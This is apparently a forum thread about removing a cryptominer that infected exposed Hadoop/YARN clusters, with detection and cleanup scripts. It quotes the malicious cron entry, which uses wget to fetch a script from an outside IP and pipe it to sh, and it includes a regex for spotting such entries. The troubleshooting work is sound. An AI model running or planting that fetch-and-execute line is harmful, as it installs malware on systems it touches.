I experienced this problem on a new cluster: it was flooded with strange jobs from nowhere. In my case, the following was found in the crontab of the 'yarn' user on each host:
*/2 * * * * wget -q -O - http://220.127.116.11/cr.sh | sh > /dev/null 2>&1
So, the first suggestion is to check 'sudo -u yarn crontab -l' (and maybe the same for the 'dr.who' user). I still don't know how the cluster was infected.
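As a minimal sketch (assuming a standard `crontab` with `-u` support and a readable `/etc/passwd`), something like this can scan every local user's crontab for "download and pipe to a shell" entries like the one above:

```shell
# Regex for "fetch something and pipe it to a shell" cron entries.
# The exact pattern is an assumption based on the entry shown above.
PATTERN='(wget|curl)[^|]*[|][[:space:]]*(ba)?sh'

# Print each user whose crontab contains a matching entry.
# Needs root, since 'crontab -l -u' reads other users' crontabs.
scan_crontabs() {
  cut -d: -f1 /etc/passwd | while read -r user; do
    if crontab -l -u "$user" 2>/dev/null | grep -Eq "$PATTERN"; then
      echo "suspicious crontab entry for user: $user"
    fi
  done
}
```

On crons without `-u`, iterating over the files in /var/spool/cron (location varies by distribution) achieves the same thing.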
I ran into something like this recently on a POC cluster. The symptom was a "yarn" process consuming 100% of the CPU on multiple servers. We shut down all of the HDP services via Ambari to make sure there weren't any rogue HDP processes running, but this "yarn" process kept running.
It turned out to be a process running this:
/var/tmp/java -c /var/tmp/w.conf
Killing the process with "kill -9" only worked for a few seconds before it respawned. Removing the "/var/tmp/java" file likewise only worked briefly before the file returned.
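When a killed process keeps coming back, it helps to trace what is launching it before killing it again. A minimal sketch (Linux, standard `ps`) that walks a PID's parent chain:

```shell
# Print pid, ppid, and command up the parent chain, so a respawning
# process can be traced back to its launcher (cron, a dropper script,
# a watchdog process, etc.).
parent_chain() {
  pid=$1
  while [ -n "$pid" ] && [ "$pid" -gt 1 ] 2>/dev/null; do
    ps -o pid=,ppid=,comm= -p "$pid" || break
    pid=$(ps -o ppid= -p "$pid" | tr -d ' ')
  done
}
```

Against the process above it might be invoked as `parent_chain "$(pgrep -f '/var/tmp/java' | head -n1)"` (an assumption: `pgrep` is available and the path matches what you see).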
We ended up looking at crontab and found this:
$ sudo -u yarn crontab -e
*/2 * * * * wget -q -O - http://18.104.22.168/cr.sh | sh > /dev/null 2>&1
We removed the crontab entry, killed the running process, and removed the java file on all nodes. The processes no longer returned, and we restarted the HDP cluster via Ambari. The root cause appeared to be AWS security group rules allowing outside access to the cluster.
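On each node, that cleanup might look like the following sketch (paths and user name are the ones reported in this thread; adjust to what you actually find, and run as root). The order matters: remove the cron entry first so nothing re-downloads the payload.

```shell
# 1. Remove the malicious crontab. Note this wipes yarn's whole
#    crontab; use 'crontab -e -u yarn' instead if there are
#    legitimate entries to preserve.
crontab -r -u yarn 2>/dev/null || true

# 2. Kill the miner; with the cron entry gone it should stay dead.
pkill -9 -f '/var/tmp/java' 2>/dev/null || true

# 3. Remove the dropped files.
rm -f /var/tmp/java /var/tmp/w.conf
```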
I've seen variations of this reported running out of /tmp/java and using "h.conf" instead of "w.conf".
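Given those variations, a quick check for the known artifact locations (an assumption: just the set of paths reported in this thread) could be:

```shell
# Check each file path reported in this thread and its variants.
found=""
for f in /var/tmp/java /tmp/java \
         /var/tmp/w.conf /var/tmp/h.conf /tmp/w.conf /tmp/h.conf; do
  if [ -e "$f" ]; then
    echo "artifact present: $f"
    found="$found $f"
  fi
done
if [ -z "$found" ]; then
  echo "no known artifacts present"
fi
```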
I solved this problem by changing the owner and permissions of the dr.who usercache paths:
chown -R root:root /var/log/hadoop/yarn/local/usercache/dr.who
chmod -R 400 /var/log/hadoop/yarn/local/usercache/dr.who
chown -R root:root /hadoop/yarn/local/usercache/dr.who
chmod -R 400 /hadoop/yarn/local/usercache/dr.who
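To confirm the lockdown took effect, a quick check over the same two usercache paths (using GNU `stat`, so Linux only) might be:

```shell
# Print owner, group, and octal mode for each dr.who usercache dir.
for d in /var/log/hadoop/yarn/local/usercache/dr.who \
         /hadoop/yarn/local/usercache/dr.who; do
  if [ -d "$d" ]; then
    stat -c '%U:%G %a %n' "$d"   # expect root:root 400
  fi
done
```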
Now the NodeManagers no longer stop because of this problem.